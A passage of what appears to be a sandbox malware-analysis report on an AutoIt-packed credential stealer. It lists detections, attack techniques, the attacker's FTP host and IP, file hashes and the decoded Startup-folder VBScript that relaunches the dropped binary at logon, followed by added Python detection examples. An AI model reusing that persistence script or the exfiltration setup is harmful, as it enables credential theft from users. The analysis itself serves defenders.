report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: cunila.exe | Binary or memory string: WIN_XPe
Source: cunila.exe | Binary or memory string: WIN_VISTA
Source: cunila.exe | Binary or memory string: WIN_7
Source: cunila.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4471177683.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00901204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00901204
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00901806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00901806
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 2_2_005A1204
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_005A1806
MITRE ATT&CK Matrix (rebuilt from the flattened 14-column table). Only techniques that carry a signature-count badge in the report are listed, grouped by tactic column; the digits are the badges exactly as the report shows them. Template cells without a badge are omitted, which is why the Reconnaissance and Lateral Movement columns are empty here.

Reconnaissance: none flagged
Resource Development: Scripting (111)
Initial Access: Valid Accounts (2)
Execution: Windows Management Instrumentation (221); Native API (1)
Persistence: Scripting (111); DLL Side-Loading (1); Valid Accounts (2); Registry Run Keys / Startup Folder (2)
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (212); Registry Run Keys / Startup Folder (2)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (331); Access Token Manipulation (21); Process Injection (212)
Credential Access: OS Credential Dumping (2); Input Capture (121); Credentials in Registry (1)
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (138); Security Software Discovery (841); Virtualization/Sandbox Evasion (331); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: none flagged
Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (121); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Exfiltration: Exfiltration Over Alternative Protocol (1)
Impact: System Shutdown/Reboot (1)

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph (ID 1584881, sample SAL987656700.exe, start date 06/01/2025, architecture Windows, score 100), rebuilt from the graph export. Bracketed numbers are the badges the graph shows next to a process (created registry values / created files, per the legend above).

Global nodes: ftp.antoniomayol.com; antoniomayol.com; 2 other IPs or domains
Global signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Start
|- SAL987656700.exe [3]
|    signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection
|    dropped: C:\Users\user\AppData\Local\...\cunila.exe (PE32)
|    `- cunila.exe [1]
|         signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 5 other signatures
|         dropped: C:\Users\user\AppData\Roaming\...\cunila.vbs (data)
|         `- RegSvcs.exe [15, 2]
|              network: antoniomayol.com 162.241.62.63 (ports seen: 21, 32929, 49705; UNIFIEDLAYER-AS-1US, United States); ip-api.com 208.95.112.1 (ports seen: 49704, 49706, 80; TUT-ASUS, United States)
|              signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
`- wscript.exe [1]
     signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
     `- cunila.exe
          signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
          `- RegSvcs.exe [2]
               signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Two execution branches appear: the direct run of the sample, and a second launch of cunila.exe by wscript.exe, which is the Startup-folder cunila.vbs route recorded under AutostartRun further down. In both branches the AutoIt loader injects into RegSvcs.exe, and it is the injected RegSvcs.exe, not cunila.exe, that performs the credential theft and the network traffic.
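The RegSvcs.exe branch above gives a detection engineer an ordered sequence to key on: an injected .NET utility first asks ip-api.com for the hosting field (the data-center/sandbox check) and then opens FTP (port 21) to antoniomayol.com. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample. It correlates that sequence per PID over a constructed connection log; the hosts, IPs and RegSvcs.exe PIDs are the ones the report lists, while the log format, the timestamps, the FileZilla and chrome lines, the allowlist and the ten-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (not from the report). One network event per line:
#   <ISO timestamp> <pid> <image> <proto> <dst ip>:<port> [<url>]
# Hosts, IPs and the RegSvcs.exe PIDs come from the report; timestamps,
# the FileZilla/chrome lines and the log shape itself are assumptions.
SAMPLE_LOG = """\
2025-01-06T17:03:05 2316 RegSvcs.exe http 208.95.112.1:80 http://ip-api.com/line/?fields=hosting
2025-01-06T17:03:06 2316 RegSvcs.exe tcp 162.241.62.63:21
2025-01-06T17:03:07 5376 RegSvcs.exe http 208.95.112.1:80 http://ip-api.com/line/?fields=hosting
2025-01-06T17:09:00 4242 filezilla.exe tcp 192.0.2.10:21
2025-01-06T17:10:00 5376 RegSvcs.exe tcp 162.241.62.63:21
2025-01-06T17:11:00 7777 chrome.exe http 208.95.112.1:80 http://ip-api.com/json/
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<pid>\d+) (?P<image>\S+) (?P<proto>\w+) "
    r"(?P<dst>[\d.]+):(?P<port>\d+)(?: (?P<url>\S+))?$"
)
# ip-api.com requests that select fields (the "hosting" field tells the
# stealer whether it runs in a data centre); a plain /json/ lookup from a
# browser does not match.
HOSTING_CHECK_RE = re.compile(r"^https?://ip-api\.com/(?:line|json)/\?fields=", re.IGNORECASE)
# Assumption: the organisation's sanctioned FTP servers.
FTP_ALLOWLIST = {"192.0.2.10"}
# .NET SDK utilities that loaders of this kind hollow out; none of them has
# a reason to talk to the network on its own.
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}

def parse(log_text):
    """Parse the constructed log into time-sorted event dicts."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # tolerate malformed lines instead of dying on them
        d = m.groupdict()
        events.append({
            "ts": datetime.fromisoformat(d["ts"]),
            "pid": int(d["pid"]),
            "image": d["image"].rsplit("\\", 1)[-1].lower(),
            "proto": d["proto"].lower(),
            "dst": d["dst"],
            "port": int(d["port"]),
            "url": d["url"],
        })
    return sorted(events, key=lambda e: e["ts"])

def correlate(log_text, window=timedelta(minutes=10)):
    """Return {pid: {"image": ..., "indicators": set()}} for every PID seen.
    The strongest indicator is the ordered chain: hosting check, then FTP
    to a non-allowlisted host from the same PID within `window`."""
    last_check = {}   # pid -> timestamp of its most recent hosting check
    findings = {}
    for e in parse(log_text):
        f = findings.setdefault(e["pid"], {"image": e["image"], "indicators": set()})
        if e["image"] in DOTNET_UTILITIES:
            f["indicators"].add("network activity from a .NET utility binary")
        if e["url"] and HOSTING_CHECK_RE.match(e["url"]):
            last_check[e["pid"]] = e["ts"]
            f["indicators"].add("hosting/datacenter check via ip-api.com")
        if e["proto"] == "tcp" and e["port"] == 21 and e["dst"] not in FTP_ALLOWLIST:
            f["indicators"].add(f"FTP to non-allowlisted host {e['dst']}")
            seen = last_check.get(e["pid"])
            if seen is not None and timedelta(0) <= e["ts"] - seen <= window:
                f["indicators"].add("FTP within window after hosting check")
    return findings

def alerts(log_text, window=timedelta(minutes=10)):
    """PIDs worth an alert: the full check-then-exfiltrate chain, or at
    least two independent indicators."""
    out = []
    for pid, f in correlate(log_text, window).items():
        chain = "FTP within window after hosting check" in f["indicators"]
        if chain or len(f["indicators"]) >= 2:
            out.append(pid)
    return sorted(out)

if __name__ == "__main__":
    for pid, f in correlate(SAMPLE_LOG).items():
        print(pid, f["image"], sorted(f["indicators"]))
    print("alerts:", alerts(SAMPLE_LOG))
```

Both RegSvcs.exe PIDs are raised; the FileZilla session (allowlisted server, no prior check) and the browser's plain ip-api.com lookup are not. The ordering matters: the window is only applied to FTP events that follow the check, so an unrelated FTP session before the check does not count as the chain.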

Antivirus detection, sample (Source | Detection | Scanner | Label):
SAL987656700.exe | 45% | ReversingLabs | Win32.Spyware.Negasteal
SAL987656700.exe | 100% | Avira | DR/AutoIt.Gen8
SAL987656700.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\enterogenous\cunila.exe | 100% | Avira | DR/AutoIt.Gen8
C:\Users\user\AppData\Local\enterogenous\cunila.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\enterogenous\cunila.exe | 45% | ReversingLabs | Win32.Spyware.Negasteal

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://ftp.antoniomayol.com | 0% | Avira URL Cloud | safe
http://antoniomayol.com | 0% | Avira URL Cloud | safe

Note that the dropped cunila.exe carries the same MD5/SHA1/SHA256 as the submitted sample (see the dropped-file and sample hashes below): the dropper copies itself to AppData\Local\enterogenous and persists that copy.
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
antoniomayol.com | 162.241.62.63 | true | true | none | unknown
ip-api.com | 208.95.112.1 | true | false | none | high
ftp.antoniomayol.com | unknown | unknown | true | none | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | false | none | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://ip-api.com/line/?fields=hosting | false | none | high

URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation):
http://antoniomayol.com | RegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ftp.antoniomayol.com | RegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp; cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp | false | none | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp | false | none | high
http://ip-api.com | RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp | false | none | high

Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.241.62.63 | antoniomayol.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1584881
                                    Start date and time:2025-01-06 17:02:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SAL987656700.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@3/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 46
                                    • Number of non-executed functions: 307
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45, 20.242.39.171, 20.12.23.50
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: SAL987656700.exe
Time | Type | Description
11:03:04 | API Interceptor | 8678012x Sleep call for process: RegSvcs.exe modified
17:03:05 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs
Context: IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
208.95.112.1
  Resource.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  P3A946MOFP.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
  BootstrapperV1.16.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
  SharkHack.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
  paint.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  X9g8L63QGs.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  KpHYfxnJs6.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  9g9LZNE4bH.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  riFSkYVMKB.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  ddos tool.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
162.241.62.63
  Order 122001-220 guanzo.exe | malicious | FormBook | www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

Context: Domains (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
ip-api.com
  Resource.exe | malicious | Blank Grabber | 208.95.112.1
  P3A946MOFP.exe | malicious | XWorm | 208.95.112.1
  BootstrapperV1.16.exe | malicious | XWorm | 208.95.112.1
  SharkHack.exe | malicious | XWorm | 208.95.112.1
  paint.exe | malicious | Blank Grabber | 208.95.112.1
  X9g8L63QGs.exe | malicious | Blank Grabber | 208.95.112.1
  KpHYfxnJs6.exe | malicious | Blank Grabber | 208.95.112.1
  9g9LZNE4bH.exe | malicious | Blank Grabber | 208.95.112.1
  riFSkYVMKB.exe | malicious | Blank Grabber | 208.95.112.1
  ddos tool.exe | malicious | XWorm | 208.95.112.1
antoniomayol.com
  DSR0987678900000.exe | malicious | AgentTesla | 15.197.240.20

The ip-api.com context is the usual picture for a public geolocation service (Blank Grabber and XWorm samples query it too), so the domain on its own is a weak indicator. antoniomayol.com is the stronger one: the only prior sample that contacted it was also AgentTesla, and it resolved to a different address (15.197.240.20) at that time, so pivot on the domain rather than the current IP.

Context: ASNs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
UNIFIEDLAYER-AS-1US
  https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8 | malicious | Unknown | 162.214.80.73
  https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63a%2F3274607708%2FSmartadvocate%2F%23%3Fnl=ZGF5aGFuYXJhQHNtYXJ0YWR2b2NhdGUuY29t/1/010901943144e678-be97f397-fbf4-4935-81cc-f9ffe0e007ba-000000/Ra9zEF9F5Gh7LdH-GSmxaBW3ylU=188 | malicious | ScreenConnect Tool | 50.116.112.103
  https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188 | malicious | ScreenConnect Tool | 50.116.112.103
  AZfDGVWF68.pdf | malicious | Unknown | 162.214.122.223
  armv5l.elf | malicious | Unknown | 50.87.220.8
  4.elf | malicious | Unknown | 173.83.210.158
  fuckunix.x86.elf | malicious | Mirai | 98.130.46.22
  Fantazy.spc.elf | malicious | Unknown | 162.215.116.7
  https://rfqdocu.construction-org.com/Q5kL4/ | malicious | HTMLPhisher | 162.241.149.91
  http://hotelyetipokhara.com | malicious | Unknown | 192.185.79.204
TUT-ASUS
  Resource.exe | malicious | Blank Grabber | 208.95.112.1
  P3A946MOFP.exe | malicious | XWorm | 208.95.112.1
  BootstrapperV1.16.exe | malicious | XWorm | 208.95.112.1
  SharkHack.exe | malicious | XWorm | 208.95.112.1
  paint.exe | malicious | Blank Grabber | 208.95.112.1
  X9g8L63QGs.exe | malicious | Blank Grabber | 208.95.112.1
  KpHYfxnJs6.exe | malicious | Blank Grabber | 208.95.112.1
  9g9LZNE4bH.exe | malicious | Blank Grabber | 208.95.112.1
  riFSkYVMKB.exe | malicious | Blank Grabber | 208.95.112.1
  ddos tool.exe | malicious | XWorm | 208.95.112.1
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\SAL987656700.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):245248
                                    Entropy (8bit):6.534796453012243
                                    Encrypted:false
                                    SSDEEP:3072:010xGZS1npfbJMeYNm6iaBasoa2MWZyAzOBndUxVRdZNeviWYYaMXcL/CdwhfA9V:OgPbboyMWZvzxVRMfAzCdF9ihw
                                    MD5:EF21E86AE3A5A36104D1383C061B83E7
                                    SHA1:53823269083797EAD7F1230BE529D8C543D2001D
                                    SHA-256:16C630D5DC716EEB21C6979C2E19E8D72A5E7B742E1B10AAAB0D0D0F38AFD94B
                                    SHA-512:A980DF1FCFBF88A80D28CF758FB9933C0B223246B5C856E1728C872B422925513FA1CB34ECF73B43D887E34A3FEEDEA446DD912D31A7C1B5C8603D8E68962F42
                                    Malicious:false
                                    Reputation:low
                                    Preview:...0:AQDJAC9..WL.OC09AQD.AC9D9WLTOC09AQDNAC9D9WLTOC09AQDNAC9.9WLZP.>9.X.o.Bu...$=<c@K.66/,cZ%W9# o!U.3$*n(-..v.l9 'U.L\NjAC9D9WL..C0u@RD=.._D9WLTOC0.ASEE@H9D.TLTGC09AQD..@9D.WLT.@09A.DNaC9D;WLPOC09AQDJAC9D9WLToG09CQDNAC9F9..TOS09QQDNAS9D)WLTOC0)AQDNAC9D9WLX.@0vAQDN.@9.<WLTOC09AQDNAC9D9WLTOG05AQDNAC9D9WLTOC09AQDNAC9D9WLTOC09AQDNAC9D9WLTOC09AQDNaC9L9WLTOC09AQDFaC9.9WLTOC09AQD`5&A09WL0.@09aQDN.@9D;WLTOC09AQDNAC9d9W,z=0BZAQD.DC9D.TLTIC09.RDNAC9D9WLTOC0yAQ.`3&U+ZWLXOC09AUDNCC9D.TLTOC09AQDNAC9.9W.TOC09AQDNAC9D9WL..@09AQD.AC9F9RL..A0QtPDMAC9E9WJTOC09AQDNAC9D9WLTOC09AQDNAC9D9WLTOC09AQDNAC9D9WLI......z.<}3&>.j.(.3..B..8.vKxB./[..r.\.....cLQ..O.?...G...L.DQ6B....v!HHJQ.;{@".$....|bM.r.J:.9.../v./E......i`...K:....M..7 ..X1!(+o.X"X%%.M.19AQD.......=7.j.B^ZzS;o..`];f...0AC9 9WL&OC0XAQD.AC9+9WL:OC0GAQD0AC9.9WL.OC0.AQDkAC9)9WLpOC0GAQD.<L6..%'.09AQD{....T.........r?.=b&....+.{..T..N+.3z....M..*..Y.(?gw.KUIG5;FUGB|Mr...mVKG5;FUGB|Mr...m.i.....?....C.0TOC09A.DN.C9D..L.OC0.A.D..C9D..L.O.0...D
                                    Process:C:\Users\user\Desktop\SAL987656700.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Category:dropped
                                    Size (bytes):892416
                                    Entropy (8bit):7.964461200331325
                                    Encrypted:false
                                    SSDEEP:12288:9sHzOUNUSB/o5LsI1uwajJ5yvv1l2lclTUX1MDc35Qx3tkscoP80In35zFYoRn33:UiUmSB/o5d1ubcv620n356C0IpZnJGO
                                    MD5:A885A9C7468691538B78D54852B5A59C
                                    SHA1:1B2340A366A6B28AC9D30F31BACEF95AFD0DE595
                                    SHA-256:D2D196A12C822020C4042D607BE77746951B6CB3C16201FF21CA8E9C5C786209
                                    SHA-512:903C918EF94C4DD9C8277C7CFFE2774A26AF285E1E41DCF71C5C3AEE1FC65D1202A2EB227267BB044C050299ACBFB67B970CA75E17F5DA1FC48E89472F45173C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 45%
                                    Reputation:low
                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...NJ{g.........."..............@..@....P... ....@.......................................@...@.......@.........................$.... ......................................................$.......D...............................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                    Process:C:\Users\user\AppData\Local\enterogenous\cunila.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.3936647990218423
                                    Encrypted:false
                                    SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Alq6YL29MnriIM8lfQVn:DsO+vNlzQ1Alq6Y4KmA2n
                                    MD5:94B8CA892BC1D9A447940F0781FE3EC0
                                    SHA1:7296D5EBC61364F24D2BCC1F3CCC4BFBBC8C8309
                                    SHA-256:F7D0D7C2AC91DCF53FB086D7B1F3907A9F2DD8AE4ED2BE1DA21DCB487411D6C6
                                    SHA-512:3753174541B031A1C62D7FF189504A1234A688F9392BC3337BACCBE140A34076C40815415C9C4B193D375180DA12226DBB7A9D7FA6E4E6046AF22F90AF154E52
                                    Malicious:true
                                    Reputation:low
Preview (raw):S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.e.n.t.e.r.o.g.e.n.o.u.s.\.c.u.n.i.l.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Preview (decoded; the file is UTF-16LE without a BOM, the dots above are the NUL bytes and line breaks):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\alfons\AppData\Local\enterogenous\cunila.exe", 1
Set WshShell = Nothing
The script is the persistence mechanism: placed in the Startup folder (see the Autostart entry above) it relaunches the dropped AutoIt binary at every logon with window style 1. The user name embedded in the path ("alfons") differs from the "user" shown in the report's other paths, so the path is the runtime profile path as written by cunila.exe rather than a fixed one.
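Startup-folder scripts of this shape are worth a periodic check on endpoints. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample. It decodes a WSH script the way wscript would (BOM, else UTF-16LE by NUL density, else single-byte), pulls out every WScript.Shell.Run target, and flags targets that launch an .exe from a user-writable directory. The malicious input is the dropped cunila.vbs re-created from the preview above; the encoding assumption is that each preview dot is a NUL byte or a single newline, and the re-created bytes come to 280 bytes, the size the report lists for the file. The benign comparison script, its path and the directory list are assumptions.

```python
import re

# Constructed sample: the dropped cunila.vbs re-created from the report's
# preview, encoded as UTF-16LE without a BOM (assumption: each dot in the
# preview is a NUL byte or a single newline character; the result is 280
# bytes, which matches the size the report lists for the file).
SAMPLE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\alfons\\AppData\\Local\\enterogenous\\cunila.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

# Constructed benign comparison (not from the report): a vendor tray agent
# launched from Program Files, ASCII-encoded, using VBScript's "" escaping.
BENIGN_VBS = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
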